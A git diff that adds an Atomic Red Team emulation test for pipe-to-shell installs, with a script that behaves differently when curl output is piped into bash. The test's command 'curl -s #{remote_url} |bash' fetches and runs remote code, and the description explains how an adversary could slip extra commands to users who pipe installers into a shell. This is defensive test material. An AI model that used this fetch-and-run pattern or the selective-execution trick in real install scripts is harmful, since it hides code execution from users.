diff --git a/atomics/T1059.004/T1059.004.yaml b/atomics/T1059.004/T1059.004.yaml
index bfc2a026..234ec392 100644
--- a/atomics/T1059.004/T1059.004.yaml
+++ b/atomics/T1059.004/T1059.004.yaml
@@ -199,3 +199,33 @@ atomic_tests:
       echo $ART |/bin/bash
     cleanup_command: | 
       unset ART
+- name: Detecting pipe-to-shell
+  description: |
+    An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
+  supported_platforms:
+  - linux
+  input_arguments:
+    remote_url:
+      description: url of remote payload
+      type: Url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
+  dependency_executor_name: bash
+  dependencies:
+  - description: |
+      Check if running on a Debian based machine.
+    prereq_command: |
+      if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
+      if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+    get_prereq_command: |
+      apt update && apt install -y curl
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      cd /tmp
+      curl -s #{remote_url}
+      ls -la /tmp/art.txt
+      curl -s #{remote_url} |bash
+      ls -la /tmp/art.txt      
+    cleanup_command: |
+      rm /tmp/art.txt
diff --git a/atomics/T1059.004/src/pipe-to-shell.sh b/atomics/T1059.004/src/pipe-to-shell.sh
new file mode 100755
index 00000000..ed0c08fd
--- /dev/null
+++ b/atomics/T1059.004/src/pipe-to-shell.sh
@@ -0,0 +1,13 @@
+#!/bin/sh
+
+# This script detects when it's being curl downloaded if it is being piped into
+# bash. The if switch -t detects a file (descriptor) that is associated with a 
+# terminal device. 0 = downloaded 1 = being piped
+
+if [ -t 1 ] 
+then 
+    echo -e "\nBeing piped\n"
+    echo "Atomic Red Team was here... T1059.004" > /tmp/art.txt
+else 
+    echo -e "\nNOT being piped\n"
+fi